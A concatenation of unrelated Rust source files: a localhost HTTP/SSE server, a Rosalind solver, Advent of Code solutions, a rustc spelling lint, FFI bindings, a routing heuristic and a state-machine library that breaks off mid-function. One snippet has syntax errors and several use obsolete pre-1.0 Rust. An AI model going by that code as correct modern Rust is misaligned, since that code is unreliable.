println!("RemoteTrace: {}", msg);
}
Message::RemoteTerm(msg) => {
for mq in mqs_to_servers.iter_mut() {
mq.send(Message::RemoteTerm(msg.clone())); // to webserver SSE
}
println!("RemoteTerm: {}", msg);
}
Message::TxReady(ready, tid) => {
for mq in mqs_to_servers.iter_mut() {
if mq.tid() == tid {
mq.set_tx_ready(ready);
}
}
println!("TxReady: {} {}", ready, tid);
}
}
}
}
/// HTTP/1.1 web server for one request per connection (no keep-alive)
fn web_server(mq: &mq::Mq, mut sse_rx: &mut SseRx, listener: TcpListener) {
for stream in listener.incoming() {
match stream {
Ok(s) => handle_connect(&mq, &mut sse_rx, s),
Err(e) => mq.error(&format!("web_server() .incoming() [{}]", e)),
}
}
}
/// Attempt to read HTTP header from TcpStream
fn handle_connect(mq: &mq::Mq, mut sse_rx: &mut SseRx, mut stream: TcpStream) {
let mut request_buf = [0; 3000];
let max_attempts = 20;
let mut header_too_big = false;
let mut tail = 0;
// Allow for possibility of header split across multiple reads.
for _ in 0..max_attempts {
match stream.read(&mut request_buf[tail..]) {
Ok(bytes_read) => {
tail += bytes_read;
if contains_blank_line(&request_buf[..tail]) {
header_too_big = false;
break;
}
}
Err(e) => {
mq.error(&format!("handle_connect() .read() [{}]", e));
break;
}
}
}
if header_too_big {
mq.error(&"handle_connect(): header too big; closing connection");
} else {
match std::str::from_utf8(&request_buf[0..tail]) {
Ok(request) => handle_request(&mq, &mut sse_rx, stream, request),
Err(e) => mq.error(&format!("handle_connection() ::from_utf8() [{}]", e)),
}
}
}
/// Test if byte array contains a blank line
/// For manual requests with netcat, use `nc -c ...` to make CRLF line endings.
fn contains_blank_line(buf: &[u8]) -> bool {
for window in buf.windows(4) {
// Look for "\r\n\r\n"
if window == [13, 10, 13, 10] {
return true;
}
}
return false;
}
/// Handle an HTTP request (possible: GET, HEAD, POST, or 501)
/// Potential surprises:
/// 1. This checks only first line of header. Discarding remainder of
/// request creates requirement to pass POST data in a ?query_string.
/// POSTing path with query is valid HTTP/1.1 and useful for this
/// purpose, but it does not obey conventions for HTML forms.
/// 2. This omits all header based security checks. As long as this server
/// only binds to localhost, skipping the checks should be fine.
fn handle_request(mq: &mq::Mq, mut sse_rx: &mut SseRx, stream: TcpStream, request: &str) {
let first_line = request.lines().next().unwrap_or(&"").trim();
let mut itfl = first_line.split(' ');
let method = itfl.next().unwrap_or(&"");
let full_path = itfl.next().unwrap_or(&"");
let protocol = itfl.next().unwrap_or(&"");
match (method, full_path, protocol) {
("GET", fp, "HTTP/1.1") => {
let mut r = http::Request::new(mq, &stream, &"GET", &fp);
handle_route(&mut r, &mut sse_rx);
}
("HEAD", fp, "HTTP/1.1") => {
let mut r = http::Request::new(mq, &stream, &"HEAD", &fp);
handle_route(&mut r, &mut sse_rx)
}
("POST", fp, "HTTP/1.1") => {
let mut r = http::Request::new(mq, &stream, &"POST", &fp);
handle_route(&mut r, &mut sse_rx);
}
_ => http::send_501(&mq, stream, &first_line),
}
}
/// Handle HTTP request for GET/HEAD/POST.
/// Possible surprise:
/// - Keyscan enpoint expects POST to /io/kbd/scancode?query where entire query
/// after "?" is scancode (not multipart/form-data in body, nor ?key=value).
/// This is valid by HTTP spec but does not follow HTML form conventions.
/// Example JS:
/// for (const k of ['P13p', P13r', 'P14p', 'P14r']) {
/// fetch('http://localhost:8000/io/kbd/scancode?'+k, {method: 'POST'});
/// }
fn handle_route(mut r: &mut http::Request, mut sse_rx: &mut SseRx) {
match r.method {
"HEAD" | "GET" => match r.path {
"/" => http::send_file(&mut r, &"www/index.html"),
"/main.js" => http::send_file(&mut r, &"www/main.js"),
"/bkit.js" => http::send_file(&mut r, &"www/bkit.js"),
"/bkbd.js" => http::send_file(&mut r, &"www/bkbd.js"),
"/style.css" => http::send_file(&mut r, &"www/style.css"),
"/io/screen" => handle_io_screen(&mut r, &mut sse_rx),
_ => http::send_404(&mut r),
},
"POST" => match (r.path, r.query) {
("/io/kbd/scancode", sc) => handle_io_scancode(&mut r, sc),
_ => http::send_404(&mut r),
},
_ => http::send_404(&mut r),
}
}
/// Handle GET request for /io/screen with Server Sent Events (SSE). This will
/// pipe messages received from message queue to a long-lived connection that
/// follows HTTP SSE protocol and generates javascript events on client side.
fn handle_io_screen(mut r: &mut http::Request, mut sse_mq: &mut SseRx) {
http::send_sse_piped_events(&mut r, &mut sse_mq);
}
/// Handle POST request for a keyboard scancode
fn handle_io_scancode(mut r: &mut http::Request, scancode: &str) {
if scancode.len() == 4 {
r.mq.kbd_scancode(scancode);
http::send_200(&mut r, http::TEXT_PLAIN, &"OK");
} else {
http::send_400(&mut r, &"Bad Scancode");
}
}
|
use serde::{Deserialize, Serialize};
use common::event::{Event, ToEvent};
use common::result::Result;
use crate::util;
#[derive(Serialize, Deserialize, Debug)]
pub enum UserEvent {
Registered {
id: String,
username: String,
email: String,
validation_code: String,
},
LoggedIn {
id: String,
auth_token: String,
},
Updated {
id: String,
name: String,
lastname: String,
},
Validated {
id: String,
},
PasswordRecoveryRequested {
id: String,
temp_password: String,
email: String,
},
Deleted {
id: String,
},
}
impl ToString for UserEvent {
fn to_string(&self) -> String {
match self {
UserEvent::Registered { .. } => "registered".to_owned(),
UserEvent::LoggedIn { .. } => "logged-in".to_owned(),
UserEvent::Updated { .. } => "updated".to_owned(),
UserEvent::Validated { .. } => "validated".to_owned(),
UserEvent::PasswordRecoveryRequested { .. } => "password-recovery-requested".to_owned(),
UserEvent::Deleted { .. } => "deleted".to_owned(),
}
}
}
impl ToEvent for UserEvent {
fn to_event(&self) -> Result<Event> {
let payload = util::serialize(&self, "user")?;
Ok(Event::new("user".to_owned(), self.to_string(), payload))
}
}
|
// Given: At most 10 DNA strings in FASTA format (of length at most 1 kbp each).
// Return: The ID of the string having the highest GC-content, followed by the GC-content of that string.
// Rosalind allows for a default error of 0.001 in all decimal answers
// unless otherwise stated; please see the note on absolute error below.
#![feature(io)]
#![feature(path)]
#![feature(core)]
#![feature(env)]
use std::env;
use std::old_io as io;
use std::old_io::File;
#[derive(Debug)]
struct Fasta {
label: String,
content: String,
}
fn main () {
let args: Vec<String> = env::args().map(|x| x.to_string())
.collect();
let path = match args.as_slice() {
[_, ref path] => Path::new(path),
_ => Path::new("rosalind_gc.txt"),
};
let mut file = match File::open(&path) {
Err(why) => panic!("couldn't open {}: {}", path.display(), why.desc),
Ok(file) => file,
};
let content = match file.read_to_string() {
Err(why) => panic!("couldn't read {}: {}", path.display(), why.desc),
Ok(string) => string,
};
let input: &str = content.as_slice();
let dnas = parse_fasta(input);
let mut max_name = "".to_string();
let mut max_gc_content = 0.0;
for dna in dnas {
let gc_content = get_gc_content(&dna);
if (max_gc_content <= gc_content) {
max_name = dna.label;
max_gc_content = gc_content;
}
}
println!("{}\n{}", max_name, max_gc_content);
}
fn get_gc_content(dna: &Fasta) -> f64 {
let mut counter = 0;
let size = dna.content.len();
for c in dna.content.graphemes(true) {
if c == "C" || c == "G" {
counter += 1;
}
}
(100 * counter) as f64/size as f64
}
fn parse_fasta(input: &str) -> Vec<Fasta> {
let mut result: Vec<Fasta> = Vec::new();
let codes: Vec<&str> = input.split('>').collect();
for c in codes {
let tokens: Vec<&str> = c.splitn(1, '\n').collect();
if tokens.len() == 2 {
let res = vec_to_fasta(tokens);
result.push(res);
}
}
result
}
fn vec_to_fasta(vec: Vec<&str>) -> Fasta {
let label = vec[0].to_string();
let content = vec[1].replace("\n","");
Fasta {label: label,
content: content}
}
|
use crate::{Backend, Entity, Repository};
use twilight_model::{
gateway::{
presence::{Activity, ClientStatus, Presence, Status, UserOrId},
payload::PresenceUpdate,
},
id::{GuildId, UserId},
};
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct PresenceEntity {
pub activities: Vec<Activity>,
pub client_status: ClientStatus,
pub guild_id: GuildId,
pub status: Status,
pub user_id: UserId,
}
impl From<Presence> for PresenceEntity {
fn from(presence: Presence) -> Self {
let user_id = match presence.user {
UserOrId::User(user) => user.id,
UserOrId::UserId { id } => id,
};
Self {
activities: presence.activities,
client_status: presence.client_status,
guild_id: presence.guild_id,
status: presence.status,
user_id,
}
}
}
impl From<PresenceUpdate> for PresenceEntity {
fn from(mut presence: PresenceUpdate) -> Self {
let mut activities = Vec::new();
if let Some(game) = presence.game {
activities.push(game);
}
activities.append(&mut presence.activities);
let user_id = match presence.user {
UserOrId::User(user) => user.id,
UserOrId::UserId { id } => id,
};
Self {
activities,
client_status: presence.client_status,
guild_id: presence.guild_id,
status: presence.status,
user_id,
}
}
}
impl Entity for PresenceEntity {
type Id = (GuildId, UserId);
/// Return an ID consisting of a tuple of the guild ID and user ID.
fn id(&self) -> Self::Id {
(self.guild_id, self.user_id)
}
}
pub trait PresenceRepository<B: Backend>: Repository<PresenceEntity, B> {}
|
use std::collections::VecDeque;
use std::time::Instant;
const INPUT: &str = include_str!("../input.txt");
fn simulate(steps: usize) -> usize {
let mut fish: VecDeque<usize> = VecDeque::from([0; 9]);
for f in INPUT
.lines()
.next()
.unwrap()
.split(',')
.map(|n| n.parse::<usize>().unwrap())
{
fish[f] += 1;
}
for _ in 0..steps {
fish.rotate_left(1);
fish[6] += fish[8];
}
fish.iter().sum()
}
fn part1() -> usize {
simulate(80)
}
fn part2() -> usize {
simulate(256)
}
fn main() {
let start = Instant::now();
println!("part 1: {}", part1());
println!("part 1 took {}ms", (Instant::now() - start).as_millis());
let start = Instant::now();
println!("part 2: {}", part2());
println!("part 2 took {}ms", (Instant::now() - start).as_millis());
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_part1() {
assert_eq!(part1(), 386536);
}
#[test]
fn test_part2() {
assert_eq!(part2(), 1732821262171);
}
}
|
pub mod fstab;
pub mod sources;
use self::fstab::FstabError;
use self::sources::SourcesError;
use ubuntu_version::{Codename, Version, VersionError};
#[derive(Debug, Error)]
pub enum RepairError {
#[error(display = "error checking and fixing fstab: {}", _0)]
Fstab(FstabError),
#[error(display = "version is not an ubuntu codename: {}", _0)]
InvalidVersion(String),
#[error(display = "failed to fetch release versions: {}", _0)]
ReleaseVersion(VersionError),
#[error(display = "error checkig and fixing sources: {}", _0)]
Sources(SourcesError),
}
pub fn repair() -> Result<(), RepairError> {
info!("performing release repair");
let codename: Codename = Version::detect().map_err(RepairError::ReleaseVersion)?.into();
fstab::repair().map_err(RepairError::Fstab)?;
sources::repair(codename).map_err(RepairError::Sources)?;
Ok(())
}
|
use markdown;
use rustc::hir;
use rustc::lint::{LateContext, LintContext, LintPass, LateLintPass, LintArray};
use syntax_pos::Span;
use syntax::ast;
use syntax::attr;
use ispell::{SpellLauncher, SpellChecker};
use markdown::{Block, Span as MdSpan};
use helpers::to_text_block;
declare_lint!(SPELLING_ERROR, Warn, "Warn about spelling errors.");
pub struct SpellingError {
// /// Stack of IDs of struct definitions.
// struct_def_stack: Vec<ast::NodeId>,
/// Stack of whether #[doc(hidden)] is set
/// at each level which has lint attributes.
doc_hidden_stack: Vec<bool>,
}
impl LintPass for SpellingError {
fn get_lints(&self) -> LintArray {
lint_array!(SPELLING_ERROR)
}
}
impl SpellingError {
pub fn new() -> SpellingError {
SpellingError {
// struct_def_stack: vec![],
doc_hidden_stack: vec![false],
}
}
fn doc_hidden(&self) -> bool {
*self.doc_hidden_stack.last().expect("empty doc_hidden_stack")
}
fn travserse_markdown_block(checker: &mut SpellChecker, cx: &LateContext, sp: Span, block: &Block) {
match *block {
Block::Header(ref spans, _) => {
for span in spans {
Self::travserse_markdown_span(checker, cx, sp, span);
}
},
Block::Paragraph(ref spans) => {
for span in spans {
Self::travserse_markdown_span(checker, cx, sp, span);
}
}
Block::Blockquote(_) => {}, // TODO
Block::CodeBlock(_) => (),
Block::UnorderedList(_) => {}, // TODO
Block::Raw(_) => {}, // TODO
Block::Hr => {},
}
}
fn travserse_markdown_span(checker: &mut SpellChecker, cx: &LateContext, sp: Span, span: &MdSpan) {
match *span {
MdSpan::Break => (),
MdSpan::Text(ref text) => {
Self::check_text(checker, cx, sp, text.clone());
},
MdSpan::Code(_) => (),
MdSpan::Link(_, _, _) => {}, // TODO
MdSpan::Image(_, _, _) => {}, // TODO: check alt text?
MdSpan::Emphasis(ref spans) => {
for span in spans {
Self::travserse_markdown_span(checker, cx, sp, span);
}
},
MdSpan::Strong(ref spans) => {
for span in spans {
Self::travserse_markdown_span(checker, cx, sp, span);
}
},
}
}
fn check_text(checker: &mut SpellChecker, cx: &LateContext, sp: Span, test_text: String) {
if let Ok(errors) = checker.check(&test_text) {
for e in errors {
if !e.suggestions.is_empty() {
cx.span_lint(SPELLING_ERROR,
sp,
&format!("'{}' is misspelled. Maybe you meant '{}'",
&e.misspelled,
&e.suggestions[0]
));
}
}
// println!("{:?}", text.as_str());
} else {
// DEBUG
// println!("FAILED RUNNING CHECK ON LINE:");
// println!("{}", test_text);
}
}
fn check_spelling_errors(&self,
cx: &LateContext,
id: Option<ast::NodeId>,
attrs: &[ast::Attribute],
sp: Span) {
// If we're building a test harness, then warning about
// documentation is probably not really relevant right now.
if cx.sess().opts.test {
return;
}
// // `#[doc(hidden)]` disables missing_docs check.
// if self.doc_hidden() {
// return;
// }
// Only check publicly-visible items, using the result from the privacy pass.
// It's an option so the crate root can also use this function (it doesn't
// have a NodeId).
if let Some(id) = id {
if !cx.access_levels.is_exported(id) {
return;
}
}
// println!("=====START BLOCK====="); // DEBUG
let mut checker = SpellLauncher::new()
.aspell()
.dictionary("en")
.timeout(1000)
.launch()
.unwrap();
let text_block = to_text_block(attrs);
let blocks = markdown::tokenize(&text_block);
for block in &blocks {
Self::travserse_markdown_block(&mut checker, cx, sp, block);
}
// println!("=====END BLOCK====="); // DEBUG
}
}
impl<'a, 'tcx> LateLintPass<'a, 'tcx> for SpellingError {
fn enter_lint_attrs(&mut self, _: &LateContext, attrs: &[ast::Attribute]) {
let doc_hidden = self.doc_hidden() ||
attrs.iter().any(|attr| {
attr.check_name("doc") &&
match attr.meta_item_list() {
None => false,
Some(l) => attr::list_contains_name(&l[..], "hidden"),
}
});
self.doc_hidden_stack.push(doc_hidden);
}
fn exit_lint_attrs(&mut self, _: &LateContext, _attrs: &[ast::Attribute]) {
self.doc_hidden_stack.pop().expect("empty doc_hidden_stack");
}
// fn check_struct_def(&mut self,
// _: &LateContext,
// _: &hir::VariantData,
// _: ast::Name,
// _: &hir::Generics,
// item_id: ast::NodeId) {
// self.struct_def_stack.push(item_id);
// }
//
// fn check_struct_def_post(&mut self,
// _: &LateContext,
// _: &hir::VariantData,
// _: ast::Name,
// _: &hir::Generics,
// item_id: ast::NodeId) {
// let popped = self.struct_def_stack.pop().expect("empty struct_def_stack");
// assert!(popped == item_id);
// }
fn check_crate(&mut self, cx: &LateContext, krate: &hir::Crate) {
self.check_spelling_errors(cx, None, &krate.attrs, krate.span);
}
fn check_item(&mut self, cx: &LateContext, it: &hir::Item) {
self.check_spelling_errors(cx, Some(it.id), &it.attrs, it.span);
}
}
|
pub trait NumberBoilerplate {
fn zero() -> Self;
}
impl NumberBoilerplate for i8 {
fn zero() -> i8 {
0i8
}
}
impl NumberBoilerplate for u8 {
fn zero() -> u8 {
0u8
}
}
// Converts an i8 or u8 slice into a string. Non UTF-8 will be lost.
//
// The FTDI strings have unique requiements:
// * They may contain interior nul bytes.
// * They might not be nul terminated.
pub fn slice_into_string<T>(array: &[T]) -> String
where
T: NumberBoilerplate + std::cmp::PartialEq,
{
let mut idx: usize = array.len();
for (i, element) in array.iter().enumerate() {
if *element == NumberBoilerplate::zero() {
idx = i;
break;
}
}
// Safety: The trait bounds for T are only implemented for u8 and i8, which
// are equal size, and are therefore safe to transmute.
debug_assert_eq!(std::mem::size_of::<T>(), std::mem::size_of::<u8>());
String::from_utf8_lossy(unsafe { &*(&array[0..idx] as *const [T] as *const [u8]) }).to_string()
}
#[cfg(test)]
mod slice_into_string {
use super::*;
#[test]
fn empty() {
let data: [i8; 0] = [];
assert_eq!(slice_into_string(&data), String::from(""));
}
#[test]
fn positive_path() {
let data: [u8; 2] = [0x61, 0x00];
assert_eq!(slice_into_string(&data), String::from("a"));
}
#[test]
fn interior_nul() {
let data: [i8; 3] = [0x61, 0x00, 0x61];
assert_eq!(slice_into_string(&data), String::from("a"));
}
#[test]
fn no_nul() {
let data: [i8; 3] = [0x61; 3];
assert_eq!(slice_into_string(&data), String::from("aaa"));
}
#[test]
fn non_utf8() {
let data: [i8; 2] = [0xFEu8 as i8, 0x00];
assert_eq!(slice_into_string(&data), String::from("�"));
}
}
|
use futures::{pin_mut, TryStreamExt};
use k8s_openapi::api::core::v1::Node;
use kube::{
api::{Api, ResourceExt},
runtime::{predicates, reflector, watcher, WatchStreamExt},
Client,
};
use tracing::*;
#[tokio::main]
async fn main() -> anyhow::Result<()> {
tracing_subscriber::fmt::init();
let client = Client::try_default().await?;
let nodes: Api<Node> = Api::all(client.clone());
let wc = watcher::Config::default()
.labels("kubernetes.io/arch=amd64") // filter instances by label
.timeout(10); // short watch timeout in this example
let (reader, writer) = reflector::store();
let rf = reflector(writer, watcher(nodes, wc))
.applied_objects()
.predicate_filter(predicates::labels); // NB: requires an unstable feature
// Periodically read our state in the background
tokio::spawn(async move {
loop {
let nodes = reader.state().iter().map(|r| r.name_any()).collect::<Vec<_>>();
info!("Current {} nodes: {:?}", nodes.len(), nodes);
tokio::time::sleep(std::time::Duration::from_secs(10)).await;
}
});
// Log applied events with changes from the reflector
pin_mut!(rf);
while let Some(node) = rf.try_next().await? {
info!("saw node {} with hitherto unseen labels", node.name_any());
}
Ok(())
}
|
#![allow(unused)]
use std::fs::File;
use std::io::Read;
use scan_fmt::*;
use std::{thread, time};
use ndarray::*;
fn main() {
let serial_number: i32 = 5177;
let mut grid: [[i32; 300]; 300] = [[0; 300]; 300];
for y in 1..=300 as i32 {
for x in 1..=300 as i32 {
let rack_id = x + 10;
let power_level = rack_id * y;
let power_level = power_level + serial_number;
let power_level = power_level * rack_id;
let power_level = (power_level % 1000) / 100;
let power_level = power_level - 5;
grid[y as usize-1][x as usize-1] = power_level;
}
}
let mut max_square_power = 0;
let mut max_y = 0;
let mut max_x = 0;
for y in 0..297 {
for x in 0..297 {
let mut square_power = 0;
for square_y in 0..3 {
for square_x in 0..3 {
square_power += grid[y+square_y][x+square_x];
}
}
if square_power > max_square_power {
max_square_power = square_power;
max_y = y;
max_x = x;
}
}
}
println!("{}: ({},{})", max_square_power, max_x+1, max_y+1);
//let max_x = 33;
//let max_y = 45;
for y in max_y..max_y+3 {
print!("[");
print!("{}", grid[y][max_x]);
for x in max_x+1..max_x+3 {
print!(",{}", grid[y][x]);
}
println!("]");
}
}
|
use fibonacci_sys as fibo;
use libc;
pub struct Fibonacci {
handle: *mut fibo::Fibonacci_t,
}
impl Fibonacci {
pub fn new() -> Self {
Self {
handle: unsafe { fibo::fibo_new() }
}
}
pub fn next(&mut self) -> u32 {
unsafe { fibo::fibo_next(self.handle) }
}
}
impl Drop for Fibonacci {
fn drop(&mut self) {
unsafe {
libc::free(self.handle as *mut core::ffi::c_void);
}
println!("free()");
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn fibonacci_test() {
let expects: [u32; 10] = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34];
let mut fibo = Fibonacci::new();
for &e in expects.iter() {
assert_eq!(fibo.next(), e);
}
}
}
|
fn main() {
let arguments = jude_omenai::matches();
match arguments.value_of("Input"){
Some(value) => jude_omenai::run(value),
None => println!("name: Jude Omenai, email: jdonmarie@gmail.com")
}
}
|
use super::SourceStream;
use crate::Result;
use bytes::Bytes;
use std::fs::File;
use std::io::Read;
use std::time::Instant;
pub struct FileSourceStream {
file: File,
}
impl FileSourceStream {
pub fn open(url: &str) -> Result<Self> {
let file = File::open(url)?;
Ok(FileSourceStream { file })
}
}
impl SourceStream for FileSourceStream {
fn receive(&mut self) -> Option<(Instant, Bytes)> {
let mut data = vec![0; 1316];
self.file.read_exact(&mut data).unwrap();
Some((Instant::now(), Bytes::from(data)))
}
}
|
pub mod gfx;
pub mod texture_array;
pub mod texture_region;
pub mod shader;
pub mod quads;
pub use self::shader::*;
pub use self::texture_array::*;
pub use self::texture_region::*;
pub use self::quads::*;
use image::Rgba;
use puck_core::Mat4;
use puck_core::color::Color;
pub fn as_rgba8(color:Color) -> Rgba<u8> {
Rgba { data: color.raw() }
}
pub fn down_size_m4(arr: [[f64; 4];4]) -> [[f32; 4]; 4] {
let mut out : [[f32; 4]; 4] = [[0.0; 4]; 4];
for a in 0..4 {
for b in 0..4 {
out[a][b] = arr[a][b] as f32
}
}
out
}
pub type Vertex = self::gfx::Vertex;
pub type BufferData = Vec<Vertex>;
pub type Transform = Mat4;
#[derive(Copy, Clone, Debug)]
pub struct Uniforms {
pub transform : Transform,
pub color: Color,
}
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
pub enum Blend {
None,
Add,
Alpha,
} |
#[derive(Copy, Clone)]
pub enum ScalarType
Boolean,
Char,
Float,
Integer,
String, // This may eventually have to be its own DataType
}
/// A primitive type
pub struct Scalar {
name: String,
scalar_type: ScalarType
}
impl Scalar {
fn new(name: &str, scalar_type: ScalarType) -> Scalar {
Scalar {
name: name,
scalar_type: scalar_type,
}
}
fn name(&self) -> String {
self.name
}
fn scalar_type(&self) -> ScalarType {
self.scalar_type
}
}
impl Data for Scalar {
fn data_type(&self) -> DataType {
DataType::Scalar(self.scalar_type))
}
}
|
use crate::construction::heuristics::*;
use crate::construction::Quota;
use crate::models::common::Cost;
use crate::models::problem::Job;
use crate::models::solution::Activity;
use std::sync::Arc;
/// Specifies insertion result variant.
pub enum InsertionResult {
/// Successful insertion result.
Success(InsertionSuccess),
/// Insertion failure.
Failure(InsertionFailure),
}
/// Specifies insertion success result needed to insert job into tour.
pub struct InsertionSuccess {
/// Specifies delta cost change for the insertion.
pub cost: Cost,
/// Original job to be inserted.
pub job: Job,
/// Specifies activities within index where they have to be inserted.
pub activities: Vec<(Activity, usize)>,
/// Specifies route context where insertion happens.
pub context: RouteContext,
}
/// Specifies insertion failure.
pub struct InsertionFailure {
/// Failed constraint code.
pub constraint: i32,
/// A flag which signalizes that algorithm should stop trying to insert at next positions.
pub stopped: bool,
/// Original job failed to be inserted.
pub job: Option<Job>,
}
/// Implements generalized insertion heuristic.
/// Using `JobSelector`, `RouteSelector`, and `ResultSelector` it tries to identify next job to
/// be inserted until there are no jobs left or it is not possible to insert due to constraint
/// limitations.
pub struct InsertionHeuristic {
insertion_evaluator: Box<dyn InsertionEvaluator + Send + Sync>,
}
impl Default for InsertionHeuristic {
fn default() -> Self {
InsertionHeuristic::new(Box::new(PositionInsertionEvaluator::default()))
}
}
impl InsertionHeuristic {
/// Creates a new instance of `InsertionHeuristic`.
pub fn new(insertion_evaluator: Box<dyn InsertionEvaluator + Send + Sync>) -> Self {
Self { insertion_evaluator }
}
}
impl InsertionHeuristic {
/// Runs common insertion heuristic algorithm using given selector specializations.
pub fn process(
&self,
ctx: InsertionContext,
job_selector: &(dyn JobSelector + Send + Sync),
route_selector: &(dyn RouteSelector + Send + Sync),
result_selector: &(dyn ResultSelector + Send + Sync),
quota: &Option<Arc<dyn Quota + Send + Sync>>,
) -> InsertionContext {
let mut ctx = ctx;
prepare_insertion_ctx(&mut ctx);
while !ctx.solution.required.is_empty() && !quota.as_ref().map_or(false, |q| q.is_reached()) {
let jobs = job_selector.select(&mut ctx).collect::<Vec<Job>>();
let routes = route_selector.select(&mut ctx, jobs.as_slice()).collect::<Vec<RouteContext>>();
let result =
self.insertion_evaluator.evaluate_all(&ctx, jobs.as_slice(), routes.as_slice(), result_selector);
apply_insertion_result(&mut ctx, result);
}
finalize_insertion_ctx(&mut ctx);
ctx
}
}
impl InsertionResult {
/// Creates result which represents insertion success.
pub fn make_success(cost: Cost, job: Job, activities: Vec<(Activity, usize)>, route_ctx: RouteContext) -> Self {
Self::Success(InsertionSuccess { cost, job, activities, context: route_ctx })
}
/// Creates result which represents insertion failure.
pub fn make_failure() -> Self {
Self::make_failure_with_code(-1, false, None)
}
/// Creates result which represents insertion failure with given code.
pub fn make_failure_with_code(code: i32, stopped: bool, job: Option<Job>) -> Self {
Self::Failure(InsertionFailure { constraint: code, stopped, job })
}
/// Compares two insertion results and returns the cheapest by cost.
pub fn choose_best_result(left: Self, right: Self) -> Self {
match (&left, &right) {
(Self::Success(_), Self::Failure(_)) => left,
(Self::Failure(_), Self::Success(_)) => right,
(Self::Success(lhs), Self::Success(rhs)) => {
if lhs.cost > rhs.cost {
right
} else {
left
}
}
_ => right,
}
}
}
pub(crate) fn prepare_insertion_ctx(ctx: &mut InsertionContext) {
ctx.solution.required.extend(ctx.solution.unassigned.iter().map(|(job, _)| job.clone()));
ctx.problem.constraint.accept_solution_state(&mut ctx.solution);
}
pub(crate) fn finalize_insertion_ctx(ctx: &mut InsertionContext) {
finalize_unassigned(ctx, -1);
ctx.problem.constraint.accept_solution_state(&mut ctx.solution);
}
pub(crate) fn apply_insertion_result(ctx: &mut InsertionContext, result: InsertionResult) {
match result {
InsertionResult::Success(success) => {
let is_new_route = ctx.solution.registry.use_route(&success.context);
let route_index = ctx.solution.routes.iter().position(|ctx| ctx == &success.context).unwrap_or_else(|| {
assert!(is_new_route);
ctx.solution.routes.push(success.context.deep_copy());
ctx.solution.routes.len() - 1
});
let route_ctx = ctx.solution.routes.get_mut(route_index).unwrap();
let route = route_ctx.route_mut();
success.activities.into_iter().for_each(|(a, index)| {
route.tour.insert_at(a, index + 1);
});
let job = success.job;
ctx.solution.required.retain(|j| *j != job);
ctx.solution.unassigned.remove(&job);
ctx.problem.constraint.accept_insertion(&mut ctx.solution, route_index, &job);
}
InsertionResult::Failure(failure) => {
if let Some(job) = failure.job {
ctx.solution.unassigned.insert(job.clone(), failure.constraint);
ctx.solution.required.retain(|j| *j != job);
} else {
// NOTE this happens when evaluator fails to insert jobs due to lack of routes in registry
finalize_unassigned(ctx, failure.constraint)
}
}
}
}
fn finalize_unassigned(ctx: &mut InsertionContext, code: i32) {
let unassigned = &ctx.solution.unassigned;
ctx.solution.required.retain(|job| !unassigned.contains_key(job));
ctx.solution.unassigned.extend(ctx.solution.required.drain(0..).map(|job| (job, code)));
}
|
/*
A Rust State Machine Library
Copyright (c) 2014 Chong Cheung
Licensed under the MIT license https://github.com/tomcheung789/rust-fsmlite/blob/master/LICENSE
*/
use std::default::Default;
pub struct State{
pub name: String,
pub enter: Option<fn()>,
pub leave: Option<fn()>
}
pub struct Event{
pub name: String,
pub from_state: Vec<String>,
pub to_state: String,
pub before: Option<fn()>,
pub after: Option<fn()>
}
pub struct Machine{
pub name: String,
pub initial_state: Option<String>,
pub final_state: Option<String>,
current_state: Option<String>,
pub states: Vec<State>,
pub events: Vec<Event>,
ready: bool
}
impl Default for State{
fn default() -> State{
State{
name: "".to_string(),
enter: None,
leave: None
}
}
}
impl Default for Event{
fn default() -> Event{
Event{
name: "".to_string(),
from_state: Vec::new(),
to_state: "".to_string(),
before: None,
after: None
}
}
}
impl Default for Machine{
fn default() -> Machine{
Machine{
name: "".to_string(),
initial_state: None,
final_state: None,
current_state: None,
states: Vec::new(),
events: Vec::new(),
ready: false
}
}
}
impl Machine{
pub fn build(&mut self) -> Result<(), String>{
//check initial_state not null
if self.initial_state.is_none() { return Err("Initial state cannot be none.".to_string()); }
//check state not null
if self.states.len() == 0 { return Err("No State is defined.".to_string()); }
//check state not duplicate
for s in self.states.iter(){
let mut count = 0i;
for sl in self.states.iter(){
if s.name == sl.name {count+=1}
}
if count != 1 { return Err(format!("Duplicate state definition: {}.",s.name)); }
}
//check event not null
if self.events.len() == 0 { return Err("No Event is defined.".to_string()); }
{
let state_exists = |state: String| -> bool {
for s in self.states.iter(){
if s.name == state { return true; }
}
false
};
//check event not duplicate
for e in self.events.iter(){
let mut count = 0i;
for el in self.events.iter(){
if e.name == el.name {count+=1}
}
if count != 1 { return Err(format!("Duplicate event definition: {}.",e.name)); }
if e.from_state.len() == 0 { return Err(format!("No from state is defined in Event {}.", e.name));}
for fs in e.from_state.iter(){
if state_exists(fs.clone()) == false { return Err(format!("State {} is not defined.", fs)); }
}
if state_exists(e.to_state.clone()) == false { return Err(format!("State {} is not defined.", e.to_state)); }
}
}
//if final_state yes , check event to_state == final_state != 0
if self.final_state.is_some() {
let final_state = self.final_state.clone().unwrap();
let mut count = 0i;
for e in self.events.iter(){
if e.to_state == final_state {count+=1}
}
if count == 0 { return Err("No event is connected to final state.".to_string()); }
}
//after checks
self.current_state = self.initial_state.clone();
self.ready = true;
Ok(())
}
pub fn fire(&mut self, event: &str) -> Result<(),String>{
//before > leave > enter > after
if self.can_fire(event) {
let current = self.current_state();
let mut c_event: &Event;
let mut c_from_state: &State;
let mut c_to_state: &State;
for e in self.events.iter() {
if e.name.as_slice() == event {
c_event = e; //get event obj
match c_event.before { //fire before event
Some(x) => x(),
None => {}
}
for s in self.states.iter(){
if s.name == current {
c_from_state = s; //get current state obj
match c_from_state.leave { //fire leave event
Some(x) => x(),
None => {}
}
break;
}
}
for s in self.states.iter(){
if s.name == c_event.to_state {
c_to_state = s; //get to state obj
match c_to_state.enter { //fire enter event
Some(x) => x(),
None => {}
}
break;
}
}
match c_event.after { //fire after event
Some(x) => x(),
None => {}
}
self.current_state = Some(c_event.to_state.clone());
break;
}
}
return Ok(());
}
if self.ready == false { return Err("State machine is not ready.".to_string()); }
if self.is_finished() { return Err("State machine is finished.".to_string()); }
Err(format!("Event {} cannot be fired.", event))
}
pub fn can_fire(&mut self, event: &str) -> bool{
if self.ready == false { return false; }
if self.is_finished() { return false; }
let current = self.current_state();
for e in self.events.iter() {
if e.name.as_slice() == event {
for fs in e.from_state.iter(){
